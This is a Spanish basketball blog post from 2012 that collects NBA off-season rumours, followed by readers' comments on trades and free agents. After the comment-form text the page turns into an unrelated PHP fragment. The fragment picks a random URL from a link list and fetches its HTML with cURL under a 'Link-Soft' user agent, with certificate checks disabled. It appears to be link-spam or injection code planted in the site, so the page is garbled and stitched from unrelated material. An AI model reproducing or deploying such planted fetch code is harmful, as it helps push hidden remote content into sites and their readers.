Rumorología variada

25 de June de 2012 por txusma

Mientras preparamos el resumen de la final y de la actuación de los diferentes equipos en esta temporada recién finalizada (por cierto, cualquier puede escribir el análisis de su equipo favorito), qué mejor que un repaso a lo que se comenta en los mentideros de la NBA. Si vosotros habéis leído algo más, no dudéis en escribirlo en los comentarios. Así completaremos perfectamente la información.

Deron Williams es, posiblemente, el mejor agente libre de este año. Su decisión puede condicionar el resto de movimientos o incluso, hundir a los Brooklin Nets en la mayor de las miserias. Parece que el ex de Utah ha limitado sus dudas entre 2 franquicias: los Brooklin Nets y los Dallas Mavericks. El factor decisivo son las dudas de que los Nets puedan completar el roster con jugadores de garantías como Gerald Wallace (que se aprovechará de esta necesidad y acabará sobrepagado) y, sobretodo, Dwight Howard. Si Deron no percibe que el equipo de Brooklin pueda ser competitivo firmará por el equipo de su ciudad Natal, Dallas. Los Angeles Lakers también siguen interesados en un sign-and-trade en el que estaría involucrado Pau Gasol, idea que los Nets habrían rechazado. Si en lugar de Gasol, el jugador fuera Andrew Bynum podrían planteárselo pero los Lakers no contemplan esta opción.

– El otro nombre de los agentes libres es el canadiense Steve Nash. En los últimos días el rumor de que podría firmar por los Toronto Raptors cobra fuerza. Los canadienses pueden ofrecer mucho más dinero que los otros 2 contendientes (New York Knicks y Miami Heat) y juegan con el factor emocional. 

Lamar Odom no es un agente libre propiamente dicho pero de todos es sabido que no volverá a la disciplina de los Mavs. Esto ha provocado el interés de muchos equipos potentes que podrían hacerse con un jugador más que válido a cambio de la Mid Level, la Bianual o, por qué no, el mínimo. New York Knicks y Miami Heat suenan pero con poca fuerza.

Kendrick Perkins jugó prácticamente todos los Playoffs y es  posible que tenga que pasar por el quirófano durante el verano pero lo espectacular es que se rumorea que pueda ser amnistiado por los Thunder. De esta manera, la franquicia podría afrontar más holgadamente las renovaciones de James Harden y Serge Ibaka.

– Los Hornets han declarado que igualarán cualquier oferta que llegue por Eric Gordon. Después de traspasar a Okafor y Ariza tienen muchísimo espacio salarial así que no nos extrañe que veamos a un jugador que se ha perdido unos 100 partidos en los últimos 3 años cobrando el máximo.

– Los Utah Jazz andan buscando una buena primera ronda y podrían ofrecer a Paul Millsap. No es que no le valoren pero su juego interior está super poblado y Millsap entra en último año de contrato.

– Una vez escogido Anthony Davis en el draft, todo es posible. Los Cavs están muy interesados en Bradley Beal pero no tienen claro que les llegue a su 4ª elección con los Wizards escogiendo justo antes que ellos. Esto ha disparado los rumores de un intercambio de elección con los Bobcats que recibirían además, la elección 24 de los Cavs. La noche del draft podríamos ver a Beal como 2ª elección y a los Wizards con cara de tontos. Michael Kidd-Gilchrist no es mal premio de consolación.

Comenta

409 comentarios a esta entrada

  1. The wolf dice:
    #1

    Los Blazers igualan la oferta de los Wolves por Batum. Se queda en Portland pues.

      Citar

  2. rumbero dice:
    #2

    Y parece que se confirma que Jamison jugará un añito en Los Ángeles y que estos siguen preguntando por Howard.

      Citar

  3. Jose Luis dice:
    #3

    Jamison por el mínimo es una gran adquisición, aunque no entiendo mucho por qué entonces no ha venido Grant Hill por la bi-anual.

      Citar

  4. MagicJohnson32 dice:
    #4

    Jose Luis:
    Jamison por el mínimo es una gran adquisición, aunque no entiendo mucho por qué entonces no ha venido Grant Hill por la bi-anual.

    Los Lakers no disponen de la biannual, excepción que en el nuevo CBA se ha restringido para los equipos que no superan en más de 4 millones el salary cap. Así que Lakers solo puede ofrecer la mini-mid level, de poco más de 3 kilos, y contratos por el mínimo (caso Jamison). La franquicia va a intentar no utilizar la mini mid.

    (Y todas estas cosas os las explicaré con detalle si algún día acabo el resumen de la temporada de los Lakers, pero chico, no hay manera…)

      Citar

  5. Esteban dice:
    #5

    magic, no soy experto en lakers como tu, pero creo que ofreceran la mini-mid level a rush, lo que seria un enorme fichaje por ese precio, los lakers necesitan un tio capaz de lanzar con consistecia desde el banco, jamison ayuda enormemente a la rotacion interna y da otra arma ofensiva con la que no contaban, pero sus perimetrales suplentes dan realmente pena, blake-goudelock-eubanks puede ser el peor perimetro suplente de toda la nba

    un rush o redd o alguien capaz que anotar de 3 con consistencia les daria otro vuelo

      Citar

  6. GreenPride dice:
    #6

    Juas! Jamison a Lakers por el mínimo es una gran operación para los de LA. Un tío que fue all-star y que realmente se encontrará ante la oportunidad con su vida visto que lo de Cleveland con LeBron no llegó a buen puerto. Un jugador ya en la cuesta abajo pero con mucha clase y lanzamiento exterior que puede ayudar mucho. Los Lakers siguen sumando jugadores y siguen saltando muy muy muy por encima del salary cap, ¿De verdad el dueño se va a gastar esa pasta? Increíble realmente, ahora con Jamison me extraña aún más que no hayan amnistiado a Artest.
    Veremos si al final se hace lo de Howard que yo veo complicado a no ser que convenzan a Bynum.

      Citar

  7. simon dice:
    #7

    Oye visto que Pau con su edad y contrato (parece) que no han podido traspasarlo… nadie ve viable la posibilidad de pasar a Pau definitivamente al puesto de 5 y traspasar a Bynum por un PF joven pero con recorrido + algun jugador aprovechable para el perimetro? Pau bajo mi punto de vista debería hacer una reconversion al “estilo” de Duncan o Garnett, en ataque es mucho mas determinante cerca del aro y jugando de 5 tendría esta posibilidad mas fácil. Ademas jugando de 4 como este año ( abierto ) hemos constatado que es muy lento para jugar de 4 a esa distancia, mientras que si que es mas rapido que los 5 jugando cerca del aro. eventualmente podría jugar de 4 pero podría jugar la mayoría de minutos como 5 puro

      Citar

  8. Ru dice:
    #8

    El camino final de Pau es jugar de 5 en la NBA pero todo depende de en qué equipo esté y qué compañeros tenga.En los Lakers si no es Bynum será Howard (que parece que está decidido a firmar una extensión con los anegelinos) así que o configuras una rotación en la que Pau coja los minutos del center suplente o va a seguir jugando de 4.

      Citar

  9. MagicJohnson32 dice:
    #9

    Alfredo:
    Propongo que alguno de los maestros de la web o que más saben de este deporte creen Rumorología Confirmada o Rumorología Variada II porque a punto de llegar a los 400 comentarios cuesta cargar todos.

    Sus deseos son órdenes 😉

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>